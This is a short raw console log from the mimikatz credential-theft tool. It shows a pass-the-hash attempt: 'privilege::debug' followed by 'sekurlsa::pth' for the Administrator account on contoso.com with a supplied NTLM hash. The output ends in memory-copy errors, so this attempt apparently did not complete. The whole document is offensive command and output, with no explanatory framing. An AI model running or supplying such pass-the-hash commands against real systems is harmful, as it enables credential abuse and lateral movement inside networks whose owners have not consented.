Using 'mimi.txt' for logfile : OK mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:4FA9EE50FA146604DB5B729010BC893B user : Administrator domain : contoso.com program : cmd.exe impers. : no NTLM : 4fa9ee50fa146604db5b729010bc893b | PID 4880 | TID 5528 | LUID 0 ; 17914618 (00000000:01115afa) \_ msv1_0 - data copy @ 000001B04678A980 : ERROR kuhl_m_sekurlsa_msv_enum_cred_callback_pth ; kull_m_memory_copy (0x00000005) \_ kerberos - data copy @ 000001B0468C8D58 \_ aes256_hmac -> ERROR kuhl_m_sekurlsa_enum_kerberos_callback_pth ; kull_m_memory_copy (0x00000005)